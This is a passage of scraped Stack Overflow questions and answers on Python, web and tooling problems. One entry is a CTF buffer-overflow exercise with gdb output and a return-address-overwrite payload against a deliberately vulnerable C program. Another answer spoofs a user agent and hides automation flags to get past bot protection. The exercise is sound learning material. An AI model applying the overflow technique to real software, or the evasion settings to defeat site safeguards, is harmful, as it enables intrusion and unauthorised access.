10s-3.516.68-4.168 1.332c-.678.678-.83 1.418-.832 1.664z"/> </svg> </a> </div> </div> </nav> </div> {% block select %} base_select {% endblock select%} {% block content %} base_content {% endblock content %} </body> </html> The template for: {% extends 'website/base.html' %} {% block page_title %} Create Tickets {% endblock %} {% block select %} <select hx-post="/createticket/" hx-swap="innerHTML" hx-trigger="change" hx-target="#form-content" selected="other" name="select_ticket_type" id="select_ticket_type"> <option value="new_user">New Employee</option> <option value="new_asset">New Asset</option> <option value="new_app">New Application</option> <option value="other">Other</option> </select> {% endblock select %} {% block content %} <form name="form-content" id="form-content" method="post"> {% csrf_token %} {{ form }} <button type="submit" name="Create Ticket">Create Ticket</button> </form> {% endblock content %} The view.py: def create_ticket(response): form_selection = response.POST.get('select_ticket_type') print(response) if response.method == "POST": match form_selection: case "new_user": print("new user") new_user = CreeateUser(response.POST) if new_user.is_valid(): # Process form A data response.session['display_form'] = response.POST.get('select_ticket_type') return redirect('createticket') case "new_app": print("new app") new_app = CreateApplication(response.POST) if new_app.is_valid(): # Process form B data response.session['display_form'] = response.POST.get('select_ticket_type') return redirect('my_view') case "new_asset": print("new asset") new_asset = CreateAsset() if new_asset.is_valid(): # Process form B data response.session['display_form'] = response.POST.get('select_ticket_type') return redirect('my_view') case _: print("other") form = CreateOther(response.POST) display_form = response.session.get('display_form', response.POST.get('select_ticket_type')) print(f"display for is {display_form}") match display_form: case "new_user": print("Form is for user") form = CreeateUser() case "new_app": print("form is for app") form = CreateApplication() case "new_asset": print("form for new asset") form = CreateAsset() case _: form = CreateOther() context = {'form': form} return render(response, 'website/createticket.html', context) I have tried to make it as simple as possible for now to reduce conflicts and narrow down what is going on. hx-swap"outer/innter/beforebegin/afterbeing/..." do not help. I wrote out the AJAX for this and it does the same thing. const select_ticket_type = document.getElementById('select_ticket_type'); select_ticket_type.addEventListener('change', function() { const selectedValue = this.value; fetch('/createticket/', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'X-CSRFToken': '{{ csrf_token }}', }, body: 'select_ticket_type=' + selectedValue, }) .then(response => response.text()) .then(data => { document.getElementById('form-content').innerHTML = data; }); }); | The issue is that on select you're replacing the <form name="form-content" id="form-content" method="post"> with your entire page. What you actually want to do is replace the contents of the form with the contents of the newly generated form, and ignore the remainder of the page. Htmx has an attribute to achieve this, hx-select. Docs here. To use it, add hx-select="#form-content" to your select tag: <select hx-post="/createticket/" hx-swap="innerHTML" hx-trigger="change" hx-target="#form-content" hx-select="#form-content" selected="other" name="select_ticket_type" id="select_ticket_type" > | 2 | 0 |
79,571,645 | 2025-4-13 | https://stackoverflow.com/questions/79571645/form-causes-an-unsupported-media-format-error | I'm working on a todo app for a class project and the /add_todo route returns a 415 error code whenever I try to add a todo. @app.route("/add-todo", methods=["GET", "POST"]) def add_todo(): title = request.get_json().get("title") db.session.add(Todo(title=title)) db.session.commit() return '', 204 <form action="/add-todo" method="post" hx-boost="true"> <input type="text" id="todo_bar"> <button id="submit">Add</button> </form> I've tried everything from changing what the route returns to adding the methods array when declaring the route, yet nothing seems to make a difference. | The data you're sending is form-encoded (by the browser). You can retrieve it by using form instead of get_json: @app.route("/add-todo", methods=["POST"]) def add_todo(): title = request.form.get("title") # Here ---------^ db.session.add(Todo(title=title)) db.session.commit() return '', 204 | 2 | 3 |
79,571,144 | 2025-4-13 | https://stackoverflow.com/questions/79571144/passing-two-named-pipes-as-input-to-ffmpeg-using-python | I have two av streams, one video and one audio, i'm trying to pipe both as inputs to ffmpeg os.mkfifo(VIDEO_PIPE_NAME) os.mkfifo(AUDIO_PIPE_NAME) ffmpeg_process = subprocess.Popen([ "ffmpeg", "-i", VIDEO_PIPE_NAME, "-i", AUDIO_PIPE_NAME, "-listen", "1", "-c:v", "copy", "-c:a", "copy", "-f", "mp4", "-movflags", "frag_keyframe+empty_moov", "http://0.0.0.0:8081"], stdin=subprocess.PIPE) pipe_video = open(VIDEO_PIPE_NAME,'wb') pipe_audio = open(AUDIO_PIPE_NAME,'wb') #Code stuck here The code stuck on pipe_audio = open(AUDIO_PIPE_NAME,'wb') line, I'm guessing it is happening because ffmpeg only reads the first/video input and ignore the second/audio input so the pipe is not being read. If I use only pipe_video and removing -i AUDIO_PIPE_NAME flag from ffmpeg everything works fine, but i only get the video without the audio. | I can confirm chrslg's comment under the OP. Placing each pipe's open() call in its own write thread should resolve your issue. I'm nearing to release a new version of ffmpegio to introduce this exact feature, and it works well. | 2 | 1 |
79,571,506 | 2025-4-13 | https://stackoverflow.com/questions/79571506/tkinter-canvas-rectangle-appears-with-incorrect-size-depending-on-row-column-h | I am writing a Python tkinter rectangle function: def Rectangle(row,col,color="#FFFFFF",outline="gray"): """ Fills a block with a color. Args: row - The row col - The column *color - The rectangle color *outline - The color of the outline """ global blockwidth, blockheight, canvas x, y, i = blockCoords(row,col) canvas.create_rectangle(x//2,y//2,x*2,y*2,fill=color,outline=outline) This function should make a rectangle at those (row, col) coordinates exactly one block (rectangle in the drawn grid, explained later) big. def blockCoords(row, col): """ Gets the row and col value of a digit. Args: rows - The block's row cols - The block's col Returns: The x and y coordinates and it's respective index """ global blockwidth, blockheight, canwidth, canheight row -= 1 col -= 1 x = col * blockwidth + blockwidth // 2 y = row * blockheight + blockheight // 2 i = row+col return x, y, i Then the rectangle function is called in the main function: blockwidth = 20 blockheight = 40 win = tk.Tk() states = [] win.title("Terminos App") with open("set.json","r") as f: settings = json.load(f) # create a canvas canwidth = 1200 canheight = 800 canvas = tk.Canvas(win,width=canwidth,height=canheight,bg="#232627") canvas.pack(fill=tk.BOTH,expand=tk.YES) def main(): """ The main function that handles the window Args: event - A detected keypress """ global win, canvas, canwidth, canheight, blockwidth, blockheight cols = canwidth//blockwidth rows = canheight//blockheight for row in range(canwidth): for col in range(canheight): states.append("") x1 = col * blockwidth y1 = row * blockheight x2 = x1 + blockwidth y2 = y1 + blockheight canvas.create_rectangle(x1, y1, x2, y2, outline="gray") # Used for debugging purposes Rectangle(10,15) The code should create the rectangle I explained, but it creates one with a different size depending on the row and col coordinates. What is the problem and what is the solution? Thanks! | You're currently treating the center point (x, y) as if it were the top-left and bottom-right corners. Instead of x//2 and x*2, calculate the corners based on width and height like this: canvas.create_rectangle(x - blockwidth // 2, y - blockheight // 2, x + blockwidth // 2, y + blockheight // 2, fill=color, outline=outline) That way, the rectangle will be exactly blockwidth × blockheight in size, centred at the calculated coordinates. | 2 | 2 |
79,569,505 | 2025-4-11 | https://stackoverflow.com/questions/79569505/load-deepseek-v3-model-from-local-repo | I want to run the DeepSeek-V3 model inference using the Hugging-Face Transformer library (>= v4.51.0). I read that you can do the following to do that (download the model and run it) from transformers import pipeline messages = [ {"role": "user", "content": "Who are you?"}, ] pipe = pipeline("text-generation", model="deepseek-ai/DeepSeek-R1", trust_remote_code=True) pipe(messages) My issue is that I already downloaded the DeepSeek-V3 hugging-face repository separately, and I just want to tell the Transformer where it is on my local machine, so that it can run the inference. The model repository is thus not (or not necessarily) in the Hugging-Face cache directory (it can be anywhere on the local machine). When loading the model, I want to provide the path which specifically points to the model's repository on the local machine. How can I achieve that? | Since you said you downloaded the model already from Huggingface, I assume you downloaded all of the related Huggingface files including the JSON files in the repo that describe the model for loading. In this case, the pipeline function can easily take a filesystem path in the model parameter instead of a model name. For example, if you downloaded the files to the folder /my-models/deepseek-r1, you just need to load it this way pipe = pipeline("text-generation", model="/my-models/deepseek-r1", trust_remote_code=True) The pipeline function will try to load from the filesystem, and if not found, it will try to look for a model with that name on the Hub. | 2 | 2 |
79,571,067 | 2025-4-13 | https://stackoverflow.com/questions/79571067/residual-analysis-for-simple-linear-regression-model | I'm trying to conduct the residual analysis for simple linear regression. I need to prove that the residuals follow an approximate Normal Distribution. The csv file I'm using has values for Percentage of marks in Grade 10 and the Salary the student makes. Once I run the below code, my plot looks like this: The plot in the book looks like this: I was expecting my plot to show up like the book as the data is the same. I have double-checked to make sure I'm not missing any data etc. I have split the data set into training and test as per the book as well. Data is as follows: Percentage Salary 62 270000 76.33 200000 72 240000 60 250000 61 180000 55 300000 70 260000 68 235000 82.8 425000 59 240000 58 250000 60 180000 66 428000 83 450000 68 300000 37.33 240000 79 252000 68.4 280000 70 231000 59 224000 63 120000 50 260000 69 300000 52 120000 49 120000 64.6 250000 50 180000 74 218000 58 360000 67 150000 75 250000 60 200000 55 300000 78 330000 50.08 265000 56 340000 68 177600 52 236000 54 265000 52 200000 76 393000 64.8 360000 74.4 300000 74.5 250000 73.5 360000 57.58 180000 68 180000 69 270000 66 240000 60.8 300000 The code is below: # Importing all required libraries for building the regression model import pandas as pd import numpy as np import statsmodels.api as sm from sklearn.model_selection import train_test_split import matplotlib.pyplot as plt # Load the dataset into dataframe mba_salary_df = pd.read_csv( 'MBA Salary.csv' ) # Add constant term of 1 to the dataset X = sm.add_constant( mba_salary_df[‘Percentage in Grade 10’] ) Y = mba_salary_df['Salary'] # Split dataset into train and test set into 80:20 respectively train_X, test_X, train_y, test_y = train_test_split( X, Y, train_size = 0.8,random_state = 100 ) # Fit the regression model mba_salary_lm = sm.OLS( train_y, train_X ).fit() mba_salary_resid = mba_salary_lm.resid probplot = sm.ProbPlot(mba_salary_resid) plt.figure( figsize = (8, 6) ) probplot.ppplot(line='45') plt.title("Normal P-P Plot of Regression Standardized Residuals") plt.show() | So, if I understand correctly, you are trying to get the residual part of a linear regression (so the error) on your training dataset, and check if the distribution of that residual part follows a normal law. But ppplot or qqplot need to know which law you want to compare your dataset against. As you probably understand, what it does is, for each sample data s, plot a point whose x coordinate is the theoretical CDF of a distribution, and y coordinate is the experimental CDF (so which proportion of s in your dataset are lower that this s). If you don't specify a distribution function, then, a centered and reduced normal law (μ=0, σ=1) is used by default. But your residual data have a scale way bigger than a standard deviation of 1. So, in practice, all your residuals are very very negative, or very very positive (from a standpoint of a N(0,1) law). I mean by that that either s is so negative than ℙ(X<s) is practically 0, or s is so positive that ℙ(X<s) is practically 1. (for X~N(0,1) that happens for any s lower than -3, or greater than +3, roughly. As you know ℙ(X<2.58)=99%... And 2.58 or 3 is very small compared to your values). So, in short, you need to say against which law you want to test your residual. If you don't, the default is a N(0,1) law that is obviously not similar at all to the distribution of your residuals (in other words: it works! and the pp-plot being bad indicates exactly what it is supposed to indicate: that, no, your residual does not follow at all a N(0,1) law). If you have no idea of that law (well, you already said you wanted to test against a normal law), maybe you want to fit one. Either by centering/reducing your data before (to that they are indeed supposed to follow approx a N(0,1)). Or by computing mean and stdev of your residual data and pass them as loc and scale argument to ProbPlot. Or create a normal law yourself (sta.norm(mean, stdev)) and pass that law to ProbPlot Or, even simpler, ask ProbPlot to fit the parameters for you (in which case, it fits a normal law. You can't choose another kind of distribution, like a weibull or Cauchy or... ; but I understand you don't want to anyway) So, long story short, if I understand correctly what you want to do probplot = sm.ProbPlot(mba_salary_resid, fit=True) is probably what your want | 5 | 3 |
79,571,051 | 2025-4-12 | https://stackoverflow.com/questions/79571051/how-can-i-type-a-method-that-accepts-any-subclass-of-a-base-class | I'm having some trouble typing subclasses of a base class. I have a base class called Table, which defines shared behavior for all table subclasses. Then, I have a Database class that manages collections of these tables. The code below works fine at runtime. However, when I try to type the methods in the Database class using Table as the type annotation, I run into issues when passing a subclass (e.g., Ducks). The types break, and MyPy complains. I think I need to use a bounded generic or a protocol, but I couldn't figure out how to make it work properly. Here’s the relevant code: #!/usr/bin/env python3 from collections.abc import Callable, Iterable, Mapping, Sequence from dataclasses import dataclass from typing import Any, Self, TypeVar # _Table = TypeVar("_Table", bound="Table") <- Tried this but did not work @dataclass class Table: @classmethod def get_name(cls) -> str: return cls.__name__.lower() @dataclass class Database: records: Mapping[str, Sequence[Table]] def filter( self, table: type[Table], _filter: Callable[[Table], bool] ) -> Iterable[Table]: yield from (i for i in self.records[table.get_name()] if _filter(i)) # USING cast(T) here kind of works but i think is kind a cheat. @dataclass class Ducks(Table): name: str age: int if __name__ == "__main__": records = { "ducks": [ Ducks(name="Patinhas", age=104), Ducks(name="Donald", age=30), Ducks(name="Huguinho", age=12), Ducks(name="Zezinho", age=12), Ducks(name="Luizinho", age=12), ] } db = Database(records) f: Callable[[Ducks], bool] = lambda t: t.age < 100 # <- BONUS QUESTION: is there a way to not use this long typing lambda and just use the untyped notation ? print(*db.filter(Ducks, _filter=f), sep="\n") # <- PROBLEM HERE $ python3 ex.py Ducks(name='Donald', age=30) Ducks(name='Huguinho', age=12) Ducks(name='Zezinho', age=12) Ducks(name='Luizinho', age=12) Mypy lint: ex.py 46 37 error arg-type Argument "_filter" to "filter" of "Database" has incompatible type "Callable[[Ducks], bool]"; expected "Callable[[Table], bool]" (lsp)) This makes sense because Callable[[Table], bool] doesn't guarantee compatibility with Ducks, even though it's a subclass. I want the method to work with any subclass of Table and have the type checker understand that. I need a way to tell the type checker that the Database functions should work with any subclass of Table, and that specific operations may require a more specific type. | As stated in the existing answer by @user2357112, you can't make this fully type safe: mapping from a name (string) to some sequence of instances can't be encoded in python's static type system, you can't map a name to a type. However, your filter method is probably the best possible approach. You didn't try to throw in more stringly-typed magic, and that's great: you only need one cast in the implementation to make the interface (how others interact with your class) statically correct. Here it is: @dataclass class Database: records: Mapping[str, Sequence[Table]] def filter( self, table: type[_Table], _filter: Callable[[_Table], bool] ) -> Iterable[_Table]: yield from ( i for i in cast("Sequence[_Table]", self.records[table.get_name()]) if _filter(i) ) Note that I cast the whole sequence. It's the only invariant you have to verify yourself (namely that a key of table.get_name() always corresponds to instances of that table - please fix the naming, tables are not rows nor records, it's mind-blowing), the rest is on type checker shoulders. And yes, this supports inline lambdas as you wanted: db = Database(records) print( *db.filter(Ducks, _filter=lambda t: t.age < 100), sep="\n" ) And here's a playground with your complete example modified for this answer. | 1 | 2 |
79,571,010 | 2025-4-12 | https://stackoverflow.com/questions/79571010/how-to-create-a-numpy-structured-array-with-different-field-values-using-full-li | I would like to create a NumPy structured array b with the same shape as a and (-1, 1) values, for example: import numpy as np Point = [('x', 'i4'), ('y', 'i4')] a = np.zeros((4, 4), dtype='u1') b = np.full_like(a, fill_value=(-1, 1), dtype=Point) # fails b = np.full_like(a, -1, dtype=Point) # works Using full_like() works with the same value for all fields, but fails with different values, producing this error: multiarray.copyto(res, fill_value, casting='unsafe') ValueError: could not broadcast input array from shape (2,) into shape (4,4) . Is there a solution other than explicitly assigning (-1, 1) to each element in a loop? | Convert the fill value into an array with the Point dtype as well import numpy as np Point = [('x', 'i4'), ('y', 'i4')] a = np.zeros((4, 4), dtype='u1') b = np.full_like(a, fill_value=np.array((-1, 1), dtype=Point), dtype=Point) # works Alternatively, if you don't need a, just create the array directly with your desired shape import numpy as np Point = [('x', 'i4'), ('y', 'i4')] b = np.full((4, 4), np.array((-1, 1), dtype=Point)) | 2 | 5 |
79,570,284 | 2025-4-12 | https://stackoverflow.com/questions/79570284/how-to-locate-and-overwrite-eip-in-a-buffer-overflow-lab-using-gdb-14-2 | I have the following code as part of a buffer overflow CTF challenge: #define _GNU_SOURCE #include <stdio.h> #include <string.h> #include <unistd.h> int my_gets(char *buf) { int i = 0; char c; while (read(0, &c, 1) > 0 && c != '\n') { buf[i++] = c; } buf[i] = '\0'; return i; } int main() { int cookie; char buf[16]; printf("&buf: %p, &cookie: %p\n", buf, &cookie); my_gets(buf); if (cookie == 0x000D0A00) { printf("%s","You win!\n"); } return 0; } . Normally, the goal is to overwrite the cookie variable to reach the value 0x000D0A00, but this value contains special characters that make direct injection difficult. So instead, my goal is to jump directly to address 0x08049232 in order to print "You win!" without needing to modify the cookie. I started by injecting 16 'A' characters to figure out the stack frame layout.. I compiled it using: gcc -m32 -z execstack -fno-stack-protector -no-pie -o stack4 stack4.c (gdb) break *0x08049232 Breakpoint 1 at 0x8049232 (gdb) run < <(python3 -c 'print("A"*16)') Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". &buf: 0xffffcfac, &cookie: 0xffffcfbc Breakpoint 1, 0x08049232 in main () (gdb) x/wc $ebp+4 0xffffcfcc: 67 'C' (gdb) x/wx $ebp+4 0xffffcfcc: 0xf7d8bd43 (gdb) info frame Stack level 0, frame at 0xffffcfe0: eip = 0x8049232 in main; saved eip = 0xf7d8bd43 Arglist at 0xffffcfc8, args: Locals at 0xffffcfc8, Previous frame's sp is 0xffffcfe0 Saved registers: ebx at 0xffffcfc4, ebp at 0xffffcfc8, eip at 0xffffcfdc (gdb) .Based on that, I crafted a payload to overwrite the value at ebp+4, since I assumed that’s where the saved return address (EIP) is stored. I intentionally avoided touching $ebp, $ebp-4, and $ebp-8 because I wasn’t sure what they were used for. Here’s the payload I tried: (gdb) run < <(python -c 'import sys; sys.stdout.buffer.write(b"A"*20 + b"\xe0\xcf\xff\xff" + b"\x14\xce\xf9\xf7" + b"\x00\x00\x00\x00" + b"\x39\x92\x04\x08")') sys.stdout.buffer.write(b"A"*20 + b"\xe0\xcf\xff\xff" + b"\x14\xce\xf9\xf7" + b"\x00\x00\x00\x00" + b"\x39\x92\x04\x08")') [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". &buf: 0xffffcfac, &cookie: 0xffffcfbc Breakpoint 1, 0x08049232 in main () (gdb) x/wx $ebp+4 0xffffcfcc: 0x08049239 (gdb) x/wx $ebp 0xffffcfc8: 0x00000000 (gdb) x/wx $ebp-4 0xffffcfc4: 0xf7f9ce14 (gdb) x/wx $ebp-8 0xffffcfc0: 0xffffcfe0 (gdb) x/wx $ebp-12 0xffffcfbc: 0x41414141 (gdb) x/wx $ebp-28 0xffffcfac: 0x41414141 (gdb) info frame Stack level 0, frame at 0xffffcfe0: eip = 0x8049232 in main; saved eip = 0xf7d8bd43 Arglist at 0xffffcfc8, args: Locals at 0xffffcfc8, Previous frame's sp is 0xffffcfe0 Saved registers: ebx at 0xffffcfc4, ebp at 0xffffcfc8, eip at 0xffffcfdc (gdb) disas mian: (gdb) disas main Dump of assembler code for function main: 0x080491e9 <+0>: lea 0x4(%esp),%ecx 0x080491ed <+4>: and $0xfffffff0,%esp 0x080491f0 <+7>: push -0x4(%ecx) 0x080491f3 <+10>: push %ebp 0x080491f4 <+11>: mov %esp,%ebp 0x080491f6 <+13>: push %ebx 0x080491f7 <+14>: push %ecx 0x080491f8 <+15>: sub $0x20,%esp 0x080491fb <+18>: call 0x80490c0 <__x86.get_pc_thunk.bx> 0x08049200 <+23>: add $0x2df4,%ebx 0x08049206 <+29>: sub $0x4,%esp 0x08049209 <+32>: lea -0xc(%ebp),%eax 0x0804920c <+35>: push %eax 0x0804920d <+36>: lea -0x1c(%ebp),%eax 0x08049210 <+39>: push %eax 0x08049211 <+40>: lea -0x1fec(%ebx),%eax 0x08049217 <+46>: push %eax 0x08049218 <+47>: call 0x8049050 <printf@plt> 0x0804921d <+52>: add $0x10,%esp 0x08049220 <+55>: sub $0xc,%esp 0x08049223 <+58>: lea -0x1c(%ebp),%eax 0x08049226 <+61>: push %eax 0x08049227 <+62>: call 0x8049186 <my_gets> 0x0804922c <+67>: add $0x10,%esp 0x0804922f <+70>: mov -0xc(%ebp),%eax 0x08049232 <+73>: cmp $0xd0a00,%eax 0x08049237 <+78>: jne 0x804924b <main+98> 0x08049239 <+80>: sub $0xc,%esp 0x0804923c <+83>: lea -0x1fd5(%ebx),%eax 0x08049242 <+89>: push %eax 0x08049243 <+90>: call 0x8049060 <puts@plt> 0x08049248 <+95>: add $0x10,%esp 0x0804924b <+98>: mov $0x0,%eax 0x08049250 <+103>: lea -0x8(%ebp),%esp 0x08049253 <+106>: pop %ecx 0x08049254 <+107>: pop %ebx 0x08049255 <+108>: pop %ebp 0x08049256 <+109>: lea -0x4(%ecx),%esp 0x08049259 <+112>: ret End of assembler dump. (gdb) However, "You win!" is not printed, and I’m unsure where I went wrong in the exploit. Could someone help me figure out what I’m missing? | Your main has non-standard stack layout and epilogue: 0x08049253 <+106>: pop %ecx 0x08049254 <+107>: pop %ebx 0x08049255 <+108>: pop %ebp 0x08049256 <+109>: lea -0x4(%ecx),%esp 0x08049259 <+112>: ret If you simply try to overflow the buffer until you overwrite the return address you overwrite the saved ecx as well which means esp will no longer point to the location where you have written the return address. Since the code helpfully leaks the address of buf you can use that to construct a payload that sets the saved copy of ecx to point there. You will need to account for the -4 offset. For example a sample run on my system produced: &buf: 0xffffd9bc, &cookie: 0xffffd9cc Therefore my payload was: print(b"\x39\x92\x04\x08AAAAAAAAAAAAAAAA\xc0\xd9\xff\xff") First the address to jump to, then 16 bytes of padding and finally &buf + 4. This correctly jumps to the intended address. However, you have compiled with -no-pie but still have PIC enabled which uses ebx to address constants. Since ebx has also been popped from the stack it is no longer valid and will result in a crash. I don't see an obvious way to fix ebx. I suspect the challenge was originally meant to be standard position dependent code so consider compiling with -fno-pic. Note: if &buf + 4 happens to include a 0x0a byte you can just re-run it until stack randomization gives you an address that does not :) Alternatively, if the 0x0a is one of the two least significant bytes you can extend your payload until you reach the next usable address. | 1 | 1 |
79,569,269 | 2025-4-11 | https://stackoverflow.com/questions/79569269/seeking-advice-on-efficient-pandas-operations-for-conditional-summing | I am a newbie to Python and pandas and would appreciate any help I can get. I have the below code and would like to know whether there is a more efficient way to write it to improve performance. I tried using cumsum but it does not give me the same output. Context: I need to calculate the total vesting_value_CAD for each trancheID by summing all trancheIDs having the same employeeID, groupName, and vesting_year with agreementDate <= the current trancheID's agreementDate, excluding the current row. Code: import pandas as pd from datetime import datetime # Create the dataframe data = { 'employeeID': [2, 2, 2, 2, 2, 2, 2], 'groupName': ['A', 'A', 'A', 'A', 'A', 'B', 'A'], 'agreementID': [7, 7, 1, 1, 8, 9, 6], 'agreementDate': ['3/1/2025', '3/1/2025', '4/1/2025', '3/1/2025', '2/1/2025', '3/1/2025', '3/1/2025'], 'trancheID': [28, 29, 26, 27, 30, 31, 32], 'vesting_year': [2025, 2026, 2026, 2027, 2026, 2026, 2026], 'vesting_value_CAD': [200, 300, 400, 500, 50, 30, 40] } df = pd.DataFrame(data) # Convert agreementDate to datetime df['agreementDate'] = pd.to_datetime(df['agreementDate'], format='%m/%d/%Y') # Function to calculate total vesting_value_CAD for each trancheID def calculate_total_vesting_value(row): # Filter the dataframe based on the conditions filtered_df = df[(df['employeeID'] == row['employeeID']) & (df['groupName'] == row['groupName']) & (df['vesting_year'] == row['vesting_year']) & (df['agreementDate'] <= row['agreementDate']) & (df['trancheID'] != row['trancheID'])] # Calculate the sum of vesting_value_CAD total_vesting_value = filtered_df['vesting_value_CAD'].sum() return total_vesting_value # Apply the function df['total_vesting_value_CAD'] = df.apply(calculate_total_vesting_value, axis=1) print(df) | Here's one approach: cols = ['employeeID', 'groupName', 'vesting_year', 'agreementDate'] out = ( df.merge( df.groupby(cols)['vesting_value_CAD'].sum() .groupby(cols[:-1]).cumsum() .rename('total_vesting_value_CAD'), on=cols ) .assign( total_vesting_value_CAD=lambda x: x['total_vesting_value_CAD'] - x['vesting_value_CAD'] ) ) Output: employeeID groupName agreementID agreementDate trancheID vesting_year \ 0 2 A 7 2025-03-01 28 2025 1 2 A 7 2025-03-01 29 2026 2 2 A 1 2025-04-01 26 2026 3 2 A 1 2025-03-01 27 2027 4 2 A 8 2025-02-01 30 2026 5 2 B 9 2025-03-01 31 2026 6 2 A 6 2025-03-01 32 2026 vesting_value_CAD total_vesting_value_CAD 0 200 0 1 300 90 2 400 390 3 500 0 4 50 0 5 30 0 6 40 350 Explanation / Intermediates Start with .groupby + groupby.sum to get the sum per date: cols = ['employeeID', 'groupName', 'vesting_year', 'agreementDate'] employeeID groupName vesting_year agreementDate 2 A 2025 2025-03-01 200 2026 2025-02-01 50 2025-03-01 340 2025-04-01 400 2027 2025-03-01 500 B 2026 2025-03-01 30 Name: vesting_value_CAD, dtype: int64 Now, chain a groupby on the same columns (now: index levels) except 'agreementDate' (cols[:-1]) + groupby.cumsum + Series.rename: (df.groupby(cols)['vesting_value_CAD'].sum() .groupby(cols[:-1]).cumsum() .rename('total_vesting_value_CAD')) employeeID groupName vesting_year agreementDate 2 A 2025 2025-03-01 200 2026 2025-02-01 50 2025-03-01 390 2025-04-01 790 2027 2025-03-01 500 B 2026 2025-03-01 30 Name: total_vesting_value_CAD, dtype: int64 Use .merge on cols to add to the original df and use .assign to correct column 'total_vesting_value_CAD' by subtracting column 'vesting_value_CAD'. df.merge(...).loc[:, ['vesting_value_CAD', 'total_vesting_value_CAD']] vesting_value_CAD total_vesting_value_CAD 0 200 200 # 200 - 200 = 0 1 300 390 # 390 - 300 = 90 2 400 790 # 790 - 400 = 390 3 500 500 # etc. 4 50 50 5 30 30 6 40 390 | 4 | 2 |
79,570,507 | 2025-4-12 | https://stackoverflow.com/questions/79570507/selenium-doesnt-open-website-with-provided-url-url-is-valid | I try to open whois EURID website with no luck. Selenium opens browser (tried with Chrome and FF), but when I try to open particular URL (http://whois.eurid.eu/): nothing opens, I got blank page only. I have driver set by this function: def set_driver() -> WebDriver: service = Service() if cfg["browser"]["browser_name"].strip().lower() == "firefox": options = webdriver.FirefoxOptions() driver = webdriver.Firefox(service=service, options=options) elif cfg["browser"]["browser_name"].strip().lower() == "edge": options = webdriver.EdgeOptions() driver = webdriver.Edge(service=service, options=options) else: options = webdriver.ChromeOptions() driver = webdriver.Chrome(service=service, options=options) return driver Using driver (set above) I try to open webiste and scrape some data (information about domain): domain_name = "ddddddd.eu" # any name ending with '.eu' URL = f"https://whois.eurid.eu/en/search/?domain={domain_name}" drv = set_driver() drv.get(URL) time.sleep(5) I think this website is currently somehow protected, as I have had no problems with opening it before. | Cloudflare Protection or User Agent Detection or JavaScript might cause the issue. Please find below an enhanced solution for your consideration: from selenium import webdriver from selenium.webdriver.chrome.service import Service from selenium.webdriver.chrome.options import Options from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC import time def get_eurid_whois(domain): chrome_options = Options() chrome_options.add_argument("--start-maximized") chrome_options.add_argument("--disable-blink-features=AutomationControlled") chrome_options.add_argument("--disable-infobars") chrome_options.add_argument("--disable-extensions") chrome_options.add_argument("--disable-popup-blocking") chrome_options.add_argument("user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) " "AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/122.0.0.0 Safari/537.36") driver = webdriver.Chrome(service=Service(), options=chrome_options) try: url = f"https://whois.eurid.eu/en/search/?domain={domain}" driver.get(url) time.sleep(3) try: WebDriverWait(driver, 15).until( EC.presence_of_element_located((By.CSS_SELECTOR, ".btn")) ) except: print("Page didn't load properly. Check if blocked by CAPTCHA.") return None try: register_button = driver.find_element(By.XPATH, "//a[contains(text(), 'Register now')]") print("Domain is available. 'Register now' button found.") return "Available" except: print("Domain is not available. 'Register now' button not found.") whois_data = driver.find_element(By.CSS_SELECTOR, ".btn").text return whois_data finally: driver.quit() print(get_eurid_whois("ddddddd.eu")) | 1 | 2 |
79,568,828 | 2025-4-11 | https://stackoverflow.com/questions/79568828/image-matching-fails-with-low-confidence-using-pyautogui-and-opencv | I'm working on automating GUI testing using OpenCV and PyAutoGui. I tried both pyautogui.locateOnScreen() and cv2.matchTemplate() to detect UI elements by matching a reference image inside a screen region. The reference image is visibly present inside the screenshot (confirmed manually), but both approaches either fail or return very low confidence (~0.21), and no click is triggered. The image path is passed via sys.argv. if __name__ == "__main__": if len(sys.argv) < 3: print("[ERROR] Usage: python OCR.py <word> <confidence>") else: word = sys.argv[1] reference_image = sys.argv[2] result = find_and_click_text(word, reference_image) print(result) Here's what works: If the path is hardcoded inside the .py script → locateOnScreen() works perfectly. If I pass the image path via sys.argv, and print it → it looks identical. Image.open(reference_image) works — file exists and loads fine. Here's what fails: pyautogui.locateOnScreen(reference_image) → fails silently or gives low confidence (~0.2) Even if I pass the loaded image object (Image.open(path)) to locateOnScreen() → it fails OpenCV's cv2.matchTemplate() also gives low confidence (~0.21) even though the reference image clearly appears in the screenshot. .py File Output: [DEBUG] Reference image path received: C:\PFE\Test_Automation\CubeMX\PA6_reference.png [DEBUG] sys.argv: ['OCR.py', 'GPIOOutput', 'C:\\PFE\\Test_Automation\\CubeMX\\PA6_reference.png'] [DEBUG] File exists at: C:/PFE/Test_Automation/CubeMX/PA6_reference.png [ERROR] Traceback (most recent call last): File "C:\Python312\Lib\site-packages\pyautogui\__init__.py", line 172, in wrapper return wrappedFunction(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Python312\Lib\site-packages\pyautogui\__init__.py", line 210, in locateOnScreen return pyscreeze.locateOnScreen(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Python312\Lib\site-packages\pyscreeze\__init__.py", line 405, in locateOnScreen retVal = locate(image, screenshotIm, **kwargs) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Python312\Lib\site-packages\pyscreeze\__init__.py", line 383, in locate points = tuple(locateAll(needleImage, haystackImage, **kwargs)) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Python312\Lib\site-packages\pyscreeze\__init__.py", line 257, in _locateAll_opencv raise ImageNotFoundException('Could not locate the image (highest confidence = %.3f)' % result.max()) pyscreeze.ImageNotFoundException: Could not locate the image (highest confidence = 0.274) What I’ve Confirmed: The problem isn't solved even when I limit the search area using pyautogui.screenshot(region=(...)) ImageChops.difference() confirms the reference and cropped screen area are pixel-perfect The reference image isn't accessed after running the script. Screenshots: The first image is my screen and the second is the reference image. Thanks in advance — I’m happy to share any additional information (code + screenshots) if needed. | Here is your template overlaid side by side with the instance I think you want to locate. See how the image content is not the same size? That is the problem. That can't match. It has to be the same size/scale. Pick the template 